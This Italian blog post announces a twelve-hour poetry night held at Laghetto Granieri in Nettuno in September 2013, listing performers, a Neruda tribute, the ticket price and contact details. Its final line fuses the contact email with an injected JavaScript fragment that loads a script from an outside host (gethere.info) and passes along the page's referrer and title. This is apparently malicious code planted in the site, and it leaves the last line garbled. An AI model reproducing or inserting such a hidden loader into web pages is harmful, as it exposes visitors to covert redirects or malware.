“La luna nel lago – Notte Bianca della Poesia” (Nettuno, 14/09/2013)
- Posted by Cristiano Sabbatini
- on Set, 09, 2013
- in Notte bianca della Poesia
- No Comments.
Dodici ore ininterrotte di musica, teatro, reading, danza, arte, cibo, campeggio e un omaggio a Neruda a 40 anni dalla morte per vivere la poesia sotto una luna nuova.
Al via la seconda edizione de La luna nel lago – Notte Bianca della Poesia. Dopo il successo di pubblico dello scorso anno, la manifestazione organizzata dal Circolo Letterario Bel-Ami, ripropone dodici ore ininterrotte di nuove performance di poesia declinata in tutti i linguaggi dell’arte e della narrazione. Il tutto presso il Palatenda del Laghetto Granieri una suggestiva location sconosciuta ai più, un teatro sul lago nel bel mezzo di un piccolo bosco a pochi chilometri dal mare di Nettuno, dalle 18.30 del 14 settembre alle 6.30 del 15 settembre 2013.
Oltre a un omaggio a Neruda, in occasione dei 40 anni dalla sua scomparsa, a cura di Maria Concetta Liotta, Luca Milesi e Gabriele Guarino della Compagnia Enter, quest’anno si susseguiranno sul palco, fra gli altri, Filippo Marcheggiani, chitarrista del Banco Del Mutuo Soccorso, Donatella Mei, poetessa, attrice e autrice apparsa in Le invasioni barbariche, Ottovolante, Maurizio Costanzo Show, SPECTRE aka Marcello Fraioli, frontman degli Ain-Soph con una performance di poesia sonora, Angelo Zabaglio, poeta e rapper, Maria Antonia Fama, autrice di Diario di un precario sentimentale, che si esibirà nel suo nuovo spettacolo teatrale Santa Sangre, per la regia di Velia Viti, le rock-band romane Caoscalmo e Il volo di Colin, il musical Notre Dame de Paris in italiano e Lingua dei Segni, di e con Laura Santarelli, l’autore di prose brevi Jacopo Ramonda, pubblicato su Nazione Indiana, e il poeta estemporaneo Iago, accompagnati dalle sonorità industrial e videoarte di DBPIT& XXENA, la Scuola Romana di Tango, la satira pungente dei Poeti Disgustisti, coreografie con giochi di fuoco e video fra cui i pluripremiati cortometraggi Genesi di Donatella Altieri, proiettato a Cannes, Il mio primo schiaffo di Corrado Ceron, proiettato al Festival di Venezia, e Resti tra di noi, di Giulia Greco, finalista al Festival Internazionale Urban Island 2013.
E nel cuore della notte, aspettando l’alba, avrà luogo una gara fra poeti a colpi di versi: il vincitore si aggiudicherà la pubblicazione di un libro – regolare contratto di edizione – con la Bel-Ami Edizioni. Il biglietto della serata per il pubblico è di 15€ e comprende aperitivo, cena, cena di mezzanotte, colazione all’alba e possibilità di campeggiare con tende o camper.
In breve
DEGUSTAZIONI: aperitivo, cena, cena di mezzanotte, colazione
DOVE: Laghetto Granieri, Nettuno
QUANDO: 12 ore, dalle 18.30 alle 6.30, nella notte fra il 14 e 15 settembre
QUANTO: 15 € a persona compresi spettacoli, degustazioni e campeggio
FACILITAZIONI: Parcheggio interno, campeggio con tenda o camper
INFO E PROGRAMMA SU: www.nottebiancadellapoesia.it
ISCRIZIONE GARA POETICA: info@nottebiancadellapoesia.it
Ufficio Stampa & Contatti
Silvia Lombardo – 338.2483751
info@nottebiancadellapoesia.its.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;